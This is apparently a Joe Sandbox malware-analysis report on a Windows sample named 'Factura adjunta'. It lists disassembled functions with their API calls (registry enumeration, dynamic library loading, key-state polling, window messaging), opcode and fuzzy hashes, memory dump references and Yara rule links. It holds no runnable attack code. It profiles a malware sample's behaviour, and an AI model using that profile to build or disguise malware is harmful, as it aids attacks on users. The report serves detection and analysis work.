                            • Instruction ID: a4f61fca4a8110e9195e483d725f7d8f1251c371ae1fe7f4f009a0ac6a333c85
                            • Opcode Fuzzy Hash: 27baeb67c495812fe26cadf670e4bc739da83c257166fbc525569b6d2cf24f01
                            • Instruction Fuzzy Hash: D1219271200205BBEF104F68DC82EBB37ADFBA97A8F508629F911D6190F771CC6197A0
                            Function 0081703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                            Download Yara Rule
                            APIs
                            • GetStdHandle.KERNEL32(0000000C), ref: 0081705E
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00817091
                            • GetStdHandle.KERNEL32(0000000C), ref: 008170A3
                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008170DD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CreateHandle$FilePipe
                            • String ID: nul
                            • API String ID: 4209266947-2873401336
                            • Opcode ID: 189ca4ecee4696e1244b1f130578178f46f2e83547a5c7ea3e854c60b67ba3fd
                            • Instruction ID: 20bd2e34c2aa30fa74c98738785c81ea12579857f6871cfcdbdb46e94b51e1c8
                            • Opcode Fuzzy Hash: 189ca4ecee4696e1244b1f130578178f46f2e83547a5c7ea3e854c60b67ba3fd
                            • Instruction Fuzzy Hash: 3D214C74504709ABDB209F28DC05ADA77BCFF98724F204A1DF9A1D72D0EBB199908B51
                            Function 0081710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                            Download Yara Rule
                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 0081712B
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0081715D
                            • GetStdHandle.KERNEL32(000000F6), ref: 0081716E
                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008171A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CreateHandle$FilePipe
                            • String ID: nul
                            • API String ID: 4209266947-2873401336
                            • Opcode ID: ddf39697fd97238f5ba0de20213ef8589e78c3235fc5385650ca728a7ea392b2
                            • Instruction ID: 17239d0ab9425a4deca7db9a875964dcb1c53daf41c99feab232e3c263fc5d8e
                            • Opcode Fuzzy Hash: ddf39697fd97238f5ba0de20213ef8589e78c3235fc5385650ca728a7ea392b2
                            • Instruction Fuzzy Hash: 6A213075904209ABDB209F689C04AEAB7BCFF55734F200A1DF9A1D72D0EB70D8D18B91
                            Function 0081AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0081AEBF
                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0081AF13
                            • __swprintf.LIBCMT ref: 0081AF2C
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0083F910), ref: 0081AF6A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume__swprintf
                            • String ID: %lu
                            • API String ID: 3164766367-685833217
                            • Opcode ID: 7f1707792e992c0c847824c9f178d792b9c2a2454a9b20a6c6e06972751b5e15
                            • Instruction ID: 001166962ad7f53cd4025840fd8e333aa36e3324108776bcd80c16f1d479d572
                            • Opcode Fuzzy Hash: 7f1707792e992c0c847824c9f178d792b9c2a2454a9b20a6c6e06972751b5e15
                            • Instruction Fuzzy Hash: 65213570A00109EFCB10DF55D985EEE7BB8FF89704B104069F905E7251DB75EA41DB61
                            Function 0080A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B7D2C: _memmove.LIBCMT ref: 007B7D66
                              • Part of subcall function 0080A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0080A399
                              • Part of subcall function 0080A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0080A3AC
                              • Part of subcall function 0080A37C: GetCurrentThreadId.KERNEL32 ref: 0080A3B3
                              • Part of subcall function 0080A37C: AttachThreadInput.USER32(00000000), ref: 0080A3BA
                            • GetFocus.USER32 ref: 0080A554
                              • Part of subcall function 0080A3C5: GetParent.USER32(?), ref: 0080A3D3
                            • GetClassNameW.USER32(?,?,00000100), ref: 0080A59D
                            • EnumChildWindows.USER32(?,0080A615), ref: 0080A5C5
                            • __swprintf.LIBCMT ref: 0080A5DF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                            • String ID: %s%d
                            • API String ID: 1941087503-1110647743
                            • Opcode ID: 6c9191e2ffb836f7ee28b814134a108f6b95d0ed9550570d8102e5e507dabe4c
                            • Instruction ID: 21815ce3fb32de9ba96ea1d9de477bde386c7a011cf47eda0c2aeb9fdf79da9b
                            • Opcode Fuzzy Hash: 6c9191e2ffb836f7ee28b814134a108f6b95d0ed9550570d8102e5e507dabe4c
                            • Instruction Fuzzy Hash: 84119071600308ABDF54BF64DC8AFEA3778FF88700F044075BA18EA292DA7599458B76
                            Function 00812017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00812048
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                            • API String ID: 3964851224-769500911
                            • Opcode ID: 4976be130a9827c940d372012957e10d9b7cec7dfb5fae6c979f8dba099b1dd0
                            • Instruction ID: 1058f07435b2287c4fc0f81717a9df6e93b16a289afa21aaa98d5778c6dba42c
                            • Opcode Fuzzy Hash: 4976be130a9827c940d372012957e10d9b7cec7dfb5fae6c979f8dba099b1dd0
                            • Instruction Fuzzy Hash: B8115B70900109CFCF04EFB4D9416EEB7B9FF1A304F10896AD856A7352EB32691ACB90
                            Function 00828F5B Relevance: 7.9, APIs: 5, Instructions: 438COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0083F910), ref: 0082903D
                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0083F910), ref: 00829071
                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008291EB
                            • SysFreeString.OLEAUT32(?), ref: 00829215
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                            • String ID:
                            • API String ID: 560350794-0
                            • Opcode ID: df531904f72ba49159ace122af8ee5655b34229df3e4203273df23291884244b
                            • Instruction ID: 88838d706d0b31c3d020c9112bf8686b6d8ab9cf013b426b1a4e2326f142c18b
                            • Opcode Fuzzy Hash: df531904f72ba49159ace122af8ee5655b34229df3e4203273df23291884244b
                            • Instruction Fuzzy Hash: 7BF13671A00119EFDB04DF94D888EAEB7B9FF88314F108459F955EB291DB31AE85CB50
                            Function 0082EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0082EF1B
                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0082EF4B
                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0082F07E
                            • CloseHandle.KERNEL32(?), ref: 0082F0FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                            • String ID:
                            • API String ID: 2364364464-0
                            • Opcode ID: 7300491a449c5c945dc50748e977fb2c455e67c05eb36529b1110bdd95f0c971
                            • Instruction ID: f2c9ef57fddfba7479fe389a127e8088b42be078d56d31527acd08c8d741240e
                            • Opcode Fuzzy Hash: 7300491a449c5c945dc50748e977fb2c455e67c05eb36529b1110bdd95f0c971
                            • Instruction Fuzzy Hash: D2814F716047109FD720DF28D846BAAB7E5FF88710F14882DF695DB292DB74AC40CB95
                            Function 008302C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                              • Part of subcall function 008310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00830038,?,?), ref: 008310BC
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00830388
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008303C7
                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0083040E
                            • RegCloseKey.ADVAPI32(?,?), ref: 0083043A
                            • RegCloseKey.ADVAPI32(00000000), ref: 00830447
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                            • String ID:
                            • API String ID: 3440857362-0
                            • Opcode ID: 1d2aa4e483828a1a916112f0c67448c48b6a0e3375a564eb3fbc9d8b4a36bf6c
                            • Instruction ID: 30ba2ae3ba2ce33b7695a34d8fa813a9bb9d1a1ac7d8531baa582a351b078321
                            • Opcode Fuzzy Hash: 1d2aa4e483828a1a916112f0c67448c48b6a0e3375a564eb3fbc9d8b4a36bf6c
                            • Instruction Fuzzy Hash: A5512C71208204EFD704EF68C895F6AB7E8FF84714F44892DB595D7292DB34E905CB92
                            Function 0082DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B9997: __itow.LIBCMT ref: 007B99C2
                              • Part of subcall function 007B9997: __swprintf.LIBCMT ref: 007B9A0C
                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0082DC3B
                            • GetProcAddress.KERNEL32(00000000,?), ref: 0082DCBE
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0082DCDA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 0082DD1B
                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0082DD35
                              • Part of subcall function 007B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00817B20,?,?,00000000), ref: 007B5B8C
                              • Part of subcall function 007B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00817B20,?,?,00000000,?,?), ref: 007B5BB0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                            • String ID:
                            • API String ID: 327935632-0
                            • Opcode ID: a24ec689e7171664ddf038670872647393b384a6f52f37ecedae5c49c25ecae6
                            • Instruction ID: 8546d09b4ff3df605e61fb8270c3967cfda3f622c7bc957ae6eee6fca11a8dbb
                            • Opcode Fuzzy Hash: a24ec689e7171664ddf038670872647393b384a6f52f37ecedae5c49c25ecae6
                            • Instruction Fuzzy Hash: FC512775A00619DFCB01EF68D488AADBBF4FF48310B04C069E915EB362DB34AD85CB91
                            Function 0081E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                            Download Yara Rule
                            APIs
                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0081E88A
                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0081E8B3
                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0081E8F2
                              • Part of subcall function 007B9997: __itow.LIBCMT ref: 007B99C2
                              • Part of subcall function 007B9997: __swprintf.LIBCMT ref: 007B9A0C
                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0081E917
                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0081E91F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                            • String ID:
                            • API String ID: 1389676194-0
                            • Opcode ID: 96b582049cfc73733e8ff6f193575041f0fe9a50c8c179fa1d3c0ba38f3f3893
                            • Instruction ID: 37a19ee1034f090b7ed37494d07ef56e4e9415fee3ea4edc78373bb105375707
                            • Opcode Fuzzy Hash: 96b582049cfc73733e8ff6f193575041f0fe9a50c8c179fa1d3c0ba38f3f3893
                            • Instruction Fuzzy Hash: 55513F35A00205DFCF01EF64C985AAEBBF9FF48310B1480A9E949AB362CB35ED51CB50
                            Function 007B2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetCursorPos.USER32(?), ref: 007B2357
                            • ScreenToClient.USER32(008767B0,?), ref: 007B2374
                            • GetAsyncKeyState.USER32(00000001), ref: 007B2399
                            • GetAsyncKeyState.USER32(00000002), ref: 007B23A7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AsyncState$ClientCursorScreen
                            • String ID:
                            • API String ID: 4210589936-0
                            • Opcode ID: 556d485a9d2fc37d972e7a4b471021be0f9c00a280e13f35093321b58bcfc12f
                            • Instruction ID: 864b72f380831ba0891983922cf7dda02f17476e9c25a8483d15603bdc6a8d7b
                            • Opcode Fuzzy Hash: 556d485a9d2fc37d972e7a4b471021be0f9c00a280e13f35093321b58bcfc12f
                            • Instruction Fuzzy Hash: D341D235905159FBCF169F69C844BEDBBB4FB49320F204319F928932A1C7385991DB91
                            Function 00806920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                            Download Yara Rule
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0080695D
                            • TranslateAcceleratorW.USER32(?,?,?), ref: 008069A9
                            • TranslateMessage.USER32(?), ref: 008069D2
                            • DispatchMessageW.USER32(?), ref: 008069DC
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008069EB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                            • String ID:
                            • API String ID: 2108273632-0
                            • Opcode ID: bb8977a41eb9b86ca6b15d785669998087e28b76ae48d3f01151ab836e712c92
                            • Instruction ID: 6a6b9d9d13b81fce868e3d2b3e78986849451a31be280572fc5df1a935b5df6f
                            • Opcode Fuzzy Hash: bb8977a41eb9b86ca6b15d785669998087e28b76ae48d3f01151ab836e712c92
                            • Instruction Fuzzy Hash: 74310031A00616AADBA0DF748C88FB67BACFB11304F144129E025C24E2F730D8B9CBA0
                            Function 00808F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00808F12
                            • PostMessageW.USER32(?,00000201,00000001), ref: 00808FBC
                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00808FC4
                            • PostMessageW.USER32(?,00000202,00000000), ref: 00808FD2
                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00808FDA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessagePostSleep$RectWindow
                            • String ID:
                            • API String ID: 3382505437-0
                            • Opcode ID: 028f042a8510fd4054ab341bb3f9ea703cd377042cfa8601a9c90920709c6589
                            • Instruction ID: e62d2ceacae5abc694134a992d7f16b307ecd6f94f5ad861b746f6f9b57c717d
                            • Opcode Fuzzy Hash: 028f042a8510fd4054ab341bb3f9ea703cd377042cfa8601a9c90920709c6589
                            • Instruction Fuzzy Hash: 1531EE7190021AEFDB00CF78DD4DA9E7BB6FB44325F104229FA64EA1D1CBB09954CB90
                            Function 0080B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                            Download Yara Rule
                            APIs
                            • IsWindowVisible.USER32(?), ref: 0080B6C7
                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0080B6E4
                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0080B71C
                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0080B742
                            • _wcsstr.LIBCMT ref: 0080B74C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
